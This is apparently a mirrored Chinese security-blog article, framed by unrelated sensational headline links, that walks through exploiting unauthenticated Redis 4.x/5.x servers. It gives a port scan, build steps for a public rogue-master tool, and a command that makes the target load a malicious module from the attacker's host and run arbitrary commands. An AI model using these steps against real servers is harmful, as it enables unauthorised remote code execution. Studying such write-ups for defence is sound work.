终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

Redis 4.x/5.x 未授权访问漏洞

黑白之道 2020-11-07


Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

漏洞利用

使用nmap对目标主机进行端口扫描:nmap -p 1-65535 -sV 目标ip



下载攻击工具:

https://github.com/vulhub/redis-rogue-getshell

解压压缩包进入文件夹,在文件夹内打开终端,cd RedisModulesSDK/ 进入RedisModulesSDK文件夹,make 编译工具。



返回上一级文件夹,输入命令:python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id" 成功执行了id命令



推荐文章++++

*SMB v1远程代码执行漏洞 (CVE-2020-1301)

*phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734)

*Tools 一款Python渗透漏洞工具


    文章有问题?点此查看未经处理的缓存